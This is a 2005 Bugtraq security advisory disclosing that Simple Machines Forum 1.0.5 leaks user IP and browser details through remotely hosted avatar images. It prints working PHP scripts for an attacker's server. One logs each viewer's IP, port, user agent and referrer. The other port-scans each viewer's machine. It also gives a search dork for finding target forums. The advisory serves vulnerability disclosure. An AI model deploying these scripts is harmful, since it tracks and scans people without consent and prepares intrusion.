[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Simple Machine Forum 1-0-5 (possibly prior versions) user IP
From:       retrogod () aliceposta ! it
Date:       2005-08-31 10:37:57
Message-ID: 20050831103757.20457.qmail () securityfocus ! com
[Download RAW message or body]

Simple Machine Forum 1-0-5 (possibly prior versions) user IP address /
information disclosure

software:
site: http://www.simplemachines.org/

information disclosure:  
a user can choose an sumbit an avatar url like this:

http://[evil_site]/image.php

where image.php is a file like this:

<?php
 $log="log".date("Ymd").".txt"; 
 $fp=fopen($log,'a');
 fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - \
".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
  fclose($fp)
?>

When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:

08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT \
5.1)-http://[target]/[path]/[page]-GET--it-/image.php

so an external user can monitor in details the forum activity, user ip addresses, \
have informations on OS and browsers used and so on

the evil script could check for open ports/services on target machines to send
them exploit code or proxies, trojan ports, do some other stuff, just an example:

<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>

googledork: "Powered by SMF"

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it


original advisory: http://rgod.altervista.org/smf105.html


[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic